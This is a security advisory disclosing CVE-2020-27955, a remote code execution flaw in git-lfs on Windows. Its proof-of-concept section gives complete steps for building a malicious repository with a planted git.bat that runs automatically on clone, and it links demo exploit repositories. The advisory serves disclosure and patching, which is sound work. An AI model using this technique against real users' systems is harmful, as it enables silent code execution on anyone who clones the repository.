============================================= - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - https://exploitbox.io - CVE-2020-27955 - Release date: 04.11.2020 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- Git <= 2.29.2 - Remote Code Execution (RCE) via git-lfs II. BACKGROUND ------------------------- Git "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. https://git-scm.com/ -- Git LFS "An open source Git extension for versioning large files Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server like GitHub.com or GitHub Enterprise." https://git-lfs.github.com/ III. INTRODUCTION ------------------------- Git in versions <= 2.29.2 includes git-lfs extension which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation. IV. DESCRIPTION ------------------------- Due to the vulnerability in git-lfs described at: Git-LFS <= 2.12 RCE Exploit Attackers may be able to plant a backdoor in the root directory of a malicious repository by simply adding an executable file named as: - git.bat - git.exe - git.cmd - git.vbs or any other executable extension available on the target Windows system (PATHEXT environment variable dependent). As a result, the malicious git binary will get executed automatically instead of the original git binary located in a trusted path. V. PROOF OF CONCEPT ------------------------- A git-lfs PoC exploit for git may be prepared with the following steps: Attacker: On a separate linux system (to prevent execution on the localhost on commit): 1. Create a new repository: mkdir git-lfs-RCE-exploit cd git-lfs-RCE-exploit git init 2. Prepare a malicious executable. E.g: git.bat with the following contents: @echo hacked > GITHACKED 3. Add the executable to the repository: git add git.bat 4. Add LFS file entries to the repository. This is necessary to trigger the vulnerable git-lfs extension when the repository is cloned and processed by the main git process. git lfs track "*.dat" git add .gitattributes echo "git exploit PoC" > big-bug-lfs-file.dat git add big-bug-lfs-file.dat 5. Commit both the exploit and the lfs files: git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit" 6. Push the changes to the repository: git remote add origin https://github.com/some-user-name/lfspoc git push -u origin master Victim: On windows, run powershell.exe shell and clone the PoC repo: git clone https://github.com/some-user-name/lfspoc . At this point the malicious executable (git.bat) will be downloaded into the repo's directory and automatically executed by the git-lfs extension without any user interaction. As a result, 'GITHACKED' file should appear in the repo's directory To check, type: dir Alternatively, a demo repository with a plain-text bat file located at https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git can be used as follows: C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git . Cloning into '.'... remote: Enumerating objects: 24, done. remote: Counting objects: 100% (24/24), done. remote: Compressing objects: 100% (15/15), done. remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0 Receiving objects: 100% (24/24), done. Resolving deltas: 100% (5/5), done. ... C:\Users\victim> type GITHACKED hacked VI. BUSINESS IMPACT ------------------------- The vulnerability can lead to a full compromise of the victim's system as attackers can execute arbitrary commands remotely without the knowledge of the victim. Due to the critical severity, affected users and product vendors should update to the latest git-lfs version as soon as possible as the vulnerability is trivial to exploit. VII. SYSTEMS AFFECTED ------------------------- Git <= 2.29.2 on Windows systems (Windows Server 2019, Windows 10 Pro etc.) with a default installation of git Windows package which has git-lfs extension in versions <= 2.12 installed. VIII. SOLUTION ------------------------- This Remote Code Execution vulnerability was reported to git-lfs vendor who issued a patched release on the official website linked below. Alternatively, the latest git release which contains the patched version of git-lfs may be installed instead. IX. REFERENCES ------------------------- https://git-lfs.github.com/ https://git-scm.com/ https://github.com/git-lfs/git-lfs git-lfs vuln advisory (CVE-2020-27955) Git RCE Exploit PoC (CVE-2020-27955) PoC repository with Bat/powershell exploit: Git-lfs RCE exploit PoC repository (Bat/powershell) PoC repository with Go version of the exploit (git.exe): Git-lfs RCE exploit PoC repository (Go) https://legalhackers.com https://ExploitBox.io Demos for other clients can also be viewed at: Git LFS RCE Visual Studio Code / VS Git-LFS RCE Exploit CVE-2020-27955 GitKraken Git-LFS RCE Exploit CVE-2020-27955 SmartGit Git-LFS RCE Exploit CVE-2020-27955 GitHub Desktop Git-LFS RCE Exploit CVE-2020-27955 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://twitter.com/dawid_golunski https://ExploitBox.io https://twitter.com/Exploit_Box XI. REVISION HISTORY ------------------------- 04.11.2020 - Advisory released, rev. 1 XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
